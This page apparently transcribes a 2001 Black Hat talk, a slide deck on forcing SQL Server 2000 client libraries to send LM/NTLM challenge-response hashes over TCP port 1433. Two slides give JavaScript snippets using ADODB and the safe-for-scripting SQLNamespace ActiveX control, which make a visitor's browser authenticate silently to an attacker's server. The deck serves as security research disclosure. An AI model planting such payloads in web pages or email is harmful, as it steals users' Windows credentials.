Grabbin creds forcing sql libs to deliver lm nt challenge and response on the back channel
Download
1 / 13

Grabbin Creds: Forcing SQL libs to deliver LM - PowerPoint PPT Presentation


  • 80 Views
  • Uploaded on

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…. Timothy M. Mullen AnchorIS.Com, Inc. [email protected] The Culprit: SQL2000 Super Sockets Lib. New functions in dbnetlib.dll! Supports TCP/IP Sockets, encryption, authentication, etc.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Grabbin Creds: Forcing SQL libs to deliver LM' - otis


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Grabbin creds forcing sql libs to deliver lm nt challenge and response on the back channel
Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Timothy M. Mullen AnchorIS.Com, Inc.

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


The culprit sql2000 super sockets lib
The Culprit:SQL2000 Super Sockets Lib

  • New functions in dbnetlib.dll!

  • Supports TCP/IP Sockets, encryption, authentication, etc.

  • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Backgrounders
Backgrounders…

  • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)

  • Integrated Authentication (NTLM Creds) needed Named Pipes

  • Named Pipes required 139/445 open to authenticating system.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Backgrounders cont
Backgrounders… cont.

  • Integrated Authentication has _always_ been the recommended configuration.

  • 139/445 has long been blocked at the router (if not, you are a yum-yum.)

  • Many server-to-server apps authenticate over TCP 1433 because it is “safe” .

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


The skinny
The Skinny

  • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.

  • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed)

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


The problem
The Problem

  • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass.

  • Many have 1433 explicitly open for application support, server-to-server queries, etc.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


The sting
The Sting

  • Client side ODBC connections can specify the target server, authentication type, and the library to use.

  • Web sites can request client to perform ADODB recordset requests, as well as other tasks.

  • HTML email as well.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Somewhat lame example
Somewhat Lame Example

  • Web site with following tag:

    {

    conn=new ActiveXObject("ADODB.Connection");

    conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';

    conn.Open();

    }

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Example cont
Example Cont…

  • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.

  • Easily engineered around…

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Not so lame example
Not So Lame Example

  • Lets try this one:

    {

    ns = new ActiveXObject("SQLNS.SQLNamespace");

    ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");

    }

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


What s the difference
What’s the difference?

  • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !

  • Silently grab the creds for fun and profit!

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Live demo
Live Demo

  • Don’t try this at home! Professional driver on closed course.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


Thanks

Thanks!

AnchorIS.Com www.anchoris.com

HammerofGod www.hammerofgod.com

Timothy M. Mullen [email protected]

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001


ad